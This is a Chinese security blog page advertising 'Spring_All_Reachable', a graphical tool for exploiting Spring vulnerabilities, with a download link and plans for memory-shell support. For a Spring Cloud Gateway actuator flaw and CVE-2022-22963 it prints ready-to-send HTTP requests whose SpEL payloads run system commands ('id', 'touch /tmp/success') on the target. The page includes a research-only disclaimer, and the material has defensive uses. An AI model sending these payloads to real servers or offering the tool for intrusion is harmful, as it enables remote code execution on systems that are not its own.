Spring_All_Reachable Spring漏洞综合利用工具

目录导航

一款针对Spring漏洞框架进行快速利用的图形化工具

Spring Cloud Gateway命令执行（Spring_All_Reachable）

漏洞描述

Spring Cloud Gateway存在远程代码执行漏洞，该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。

漏洞影响

VMWare Spring Cloud GateWay 3.1.0
VMWare Spring Cloud GateWay >=3.0.0，<=3.0.6
VMWare Spring Cloud GateWay <3.0.0

漏洞poc

POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 328 { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"}
  }], "uri": "http://example.com", "order": 0
}

POST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close

POST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

工具使用

Spring Cloud Function SpEL 远程代码执行 (CVE-2022-22963)

漏洞描述

Spring Cloud Function 是Spring cloud中的serverless框架。

Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“spring.cloud.function.routing-expression”参数作为 Spel 表达式进行处理，造成 Spel 表达式注入漏洞。

攻击者可通过该漏洞执行任意代码。

漏洞影响

org.springframework.cloud:spring-cloud-function-context（影响版本：3.0.0.RELEASE~3.2.2）

漏洞poc

POST /functionRouter HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success") Content-Type: text/plain Content-Length: 4 test

工具使用

此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！如果使用者使用该工具出现非法攻击等违法行为，与本作者无关！

TODO

Spring Core RCE
支持更多类型内存马
支持内存马密码修改

……..

下载地址

Spring_All_Reachable-2.1.jar

项目地址

GitHub:
https://github.com/savior-only/Spring_All_Reachable

扫描二维码，在手机上阅读

版权说明

文章采用：《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
版权声明：未标注转载均为本站原创，转载时请以链接形式注明文章出处。如有侵权、不妥之处，请联系站长删除。敬请谅解！

Spring Cloud Gateway命令执行（Spring_All_Reachable）

漏洞描述

漏洞影响

漏洞poc

工具使用

Spring Cloud Function SpEL 远程代码执行 (CVE-2022-22963)

漏洞描述

漏洞影响

漏洞poc

工具使用

TODO

下载地址

项目地址

相关推荐

ClassLoader动态类加载

渗透测试中的10个常见误区

SQLMap（一个自动化的SQL注入工具）

如何获得PowerShell命令的历史记录

最新评论

标签

您还未登录

登录体验更多功能

Spring Cloud Gateway命令执行（Spring_All_Reachable）

漏洞描述

漏洞影响

漏洞poc

工具使用

Spring Cloud Function SpEL 远程代码执行 (CVE-2022-22963)

漏洞描述

漏洞影响

漏洞poc

工具使用

TODO

下载地址

项目地址

相关推荐

ClassLoader动态类加载

渗透测试中的10个常见误区

SQLMap（一个自动化的SQL注入工具）

如何获得PowerShell命令的历史记录

最新评论

标签